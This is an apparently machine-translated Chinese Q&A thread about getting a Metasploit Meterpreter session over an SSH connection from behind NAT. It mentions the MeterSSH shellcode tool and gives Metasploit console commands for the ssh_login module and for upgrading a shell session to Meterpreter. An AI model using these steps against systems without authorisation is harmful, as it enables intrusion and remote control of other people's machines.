ssh连接上的Meterpreter

我落后于NAT。

我可以通过ssh登录到目标。

如何使用metasploit/ meterpreter通过该SSH连接发送？

我尝试了一下，shell_to_meterpreter但是失败了，因为我无法打开我的端口以连接反向TCP。

两台机器都在Linux上。

ssh metasploit

— vfjpl
source

视窗：

您可以尝试使用MeterSSH。

MeterSSH是将本机shellcode注入内存并通过SSH隧道通过SSH将任何内容通过管道传输到攻击者计算机并将所有自身包含在一个Python文件中的简便方法。

Linux的：

您可以使用称为ssh_login的metasploit辅助模块：

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.0.109  
msf auxiliary(ssh_login) > set username foo   
msf auxiliary(ssh_login) > set password bar
msf auxiliary(ssh_login) > exploit

现在通过以下命令将命令shell转换为meterpreter shell

session –u 1

— alexfrancow
source

我忘了补充。两台机器都在Linux上。

— vfjpl